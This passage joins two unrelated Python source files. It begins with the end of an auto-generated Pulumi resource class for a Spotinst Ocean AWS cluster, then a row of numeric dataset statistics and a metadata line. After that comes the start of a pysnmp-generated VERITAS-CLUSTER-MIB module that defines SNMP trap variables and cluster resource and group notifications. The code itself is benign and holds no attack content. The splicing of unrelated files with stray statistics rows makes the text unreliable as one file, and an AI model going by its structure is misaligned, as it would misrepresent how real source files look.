:param pulumi.Input[bool] use_as_template_only: When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
       In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OceanState.__new__(_OceanState)
__props__.__dict__["associate_public_ip_address"] = associate_public_ip_address
__props__.__dict__["autoscaler"] = autoscaler
__props__.__dict__["blacklists"] = blacklists
__props__.__dict__["controller_id"] = controller_id
__props__.__dict__["desired_capacity"] = desired_capacity
__props__.__dict__["draining_timeout"] = draining_timeout
__props__.__dict__["ebs_optimized"] = ebs_optimized
__props__.__dict__["fallback_to_ondemand"] = fallback_to_ondemand
__props__.__dict__["grace_period"] = grace_period
__props__.__dict__["iam_instance_profile"] = iam_instance_profile
__props__.__dict__["image_id"] = image_id
__props__.__dict__["instance_metadata_options"] = instance_metadata_options
__props__.__dict__["key_name"] = key_name
__props__.__dict__["load_balancers"] = load_balancers
__props__.__dict__["logging"] = logging
__props__.__dict__["max_size"] = max_size
__props__.__dict__["min_size"] = min_size
__props__.__dict__["monitoring"] = monitoring
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["root_volume_size"] = root_volume_size
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["spot_percentage"] = spot_percentage
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["update_policy"] = update_policy
__props__.__dict__["use_as_template_only"] = use_as_template_only
__props__.__dict__["user_data"] = user_data
__props__.__dict__["utilize_commitments"] = utilize_commitments
__props__.__dict__["utilize_reserved_instances"] = utilize_reserved_instances
__props__.__dict__["whitelists"] = whitelists
return Ocean(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@property
@pulumi.getter
def autoscaler(self) -> pulumi.Output[Optional['outputs.OceanAutoscaler']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@property
@pulumi.getter
def blacklists(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> pulumi.Output[Optional[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> pulumi.Output[int]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> pulumi.Output[Optional[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
Enable EBS-optimized instances for the cluster. This flag enables optimized capacity for high-bandwidth connectivity to the EBS service for instance types that are not EBS-optimized. For instances that are EBS-optimized, this flag is ignored.
"""
return pulumi.get(self, "ebs_optimized")
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> pulumi.Output[Optional[bool]]:
"""
If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> pulumi.Output[Optional[str]]:
"""
The instance profile IAM role.
"""
return pulumi.get(self, "iam_instance_profile")
@property
@pulumi.getter(name="imageId")
def image_id(self) -> pulumi.Output[Optional[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> pulumi.Output[Optional['outputs.OceanInstanceMetadataOptions']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> pulumi.Output[Optional[str]]:
"""
The key pair to attach to the instances.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> pulumi.Output[Optional[Sequence['outputs.OceanLoadBalancer']]]:
"""
Array of load balancer objects to add to the Ocean cluster.
"""
return pulumi.get(self, "load_balancers")
@property
@pulumi.getter
def logging(self) -> pulumi.Output[Optional['outputs.OceanLogging']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> pulumi.Output[Optional[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@property
@pulumi.getter(name="minSize")
def min_size(self) -> pulumi.Output[int]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@property
@pulumi.getter
def monitoring(self) -> pulumi.Output[Optional[bool]]:
"""
Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> pulumi.Output[Optional[int]]:
"""
The size (in GB) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.OceanScheduledTask']]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Output[Sequence[str]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> pulumi.Output[Optional[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Output[Sequence[str]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.OceanTag']]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> pulumi.Output[Optional['outputs.OceanUpdatePolicy']]:
return pulumi.get(self, "update_policy")
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> pulumi.Output[Optional[bool]]:
"""
When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
"""
return pulumi.get(self, "use_as_template_only")
@property
@pulumi.getter(name="userData")
def user_data(self) -> pulumi.Output[Optional[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "utilize_commitments")
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> pulumi.Output[Optional[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@property
@pulumi.getter
def whitelists(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
| 51.108312 | 270 | 0.676762 | 9,690 | 81,160 | 5.467595 | 0.03612 | 0.104434 | 0.101131 | 0.034427 | 0.968498 | 0.961779 | 0.948717 | 0.943282 | 0.937147 | 0.920236 | 0 | 0.00057 | 0.22171 | 81,160 | 1,587 | 271 | 51.140517 | 0.838188 | 0.309808 | 0 | 0.908999 | 1 | 0 | 0.124784 | 0.036747 | 0 | 0 | 0 | 0 | 0 | 1 | 0.168857 | false | 0.001011 | 0.007078 | 0.006067 | 0.277048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
941592e7be5e1d67879a16f149bcf752840dbbee | 32,550 | py | Python | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module VERITAS-CLUSTER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/VERITAS-CLUSTER-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:26:59 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, Unsigned32, Bits, Counter32, ObjectIdentity, Gauge32, Counter64, NotificationType, IpAddress, ModuleIdentity, NotificationType, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, iso, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "Unsigned32", "Bits", "Counter32", "ObjectIdentity", "Gauge32", "Counter64", "NotificationType", "IpAddress", "ModuleIdentity", "NotificationType", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "iso", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
veritassoftware = MibIdentifier((1, 3, 6, 1, 4, 1, 1302))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3))
veritasCluster = ModuleIdentity((1, 3, 6, 1, 4, 1, 1302, 3, 8))
if mibBuilder.loadTexts: veritasCluster.setLastUpdated('03202001')
if mibBuilder.loadTexts: veritasCluster.setOrganization('VERITAS Software, Inc.')
clustertraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10))
clustertrapvars = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1))
clustertrapsGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2))
resourcesTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1))
groupsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2))
systemsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3))
vcsHeartbeatTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 4))
gcmHeartbeatTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 5))
vcsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 6))
gcmSiteTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 7))
agentsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8))
externalTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 9))
rdcTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10))
trapOrigin = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: trapOrigin.setStatus('mandatory')
entityType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityType.setStatus('mandatory')
entitySubType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entitySubType.setStatus('mandatory')
entityName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityName.setStatus('mandatory')
entityOwner = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityOwner.setStatus('mandatory')
systemName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemName.setStatus('mandatory')
systemLocation = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemLocation.setStatus('mandatory')
entityState = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityState.setStatus('mandatory')
entityContainerType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityContainerType.setStatus('mandatory')
entityContainerName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityContainerName.setStatus('mandatory')
peerSystemName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 11), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: peerSystemName.setStatus('mandatory')
peerSystemLocation = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 12), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: peerSystemLocation.setStatus('mandatory')
message = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 13), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: message.setStatus('mandatory')
eventTime = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 14), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: eventTime.setStatus('mandatory')
severityId = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("information", 0), ("warning", 1), ("error", 2), ("severeError", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: severityId.setStatus('mandatory')
clusterResourceStateUnknownTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceMonitorTimeoutTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceNotGoingOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceRestartingByAgentTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceWentOnlineByItselfTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterResourceFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupOnlineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupAutoDisabledTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupFaultedAndNowhereToFailoverTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupRestartingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupInitiatingForSwitchingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGroupConcurencyViolationTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
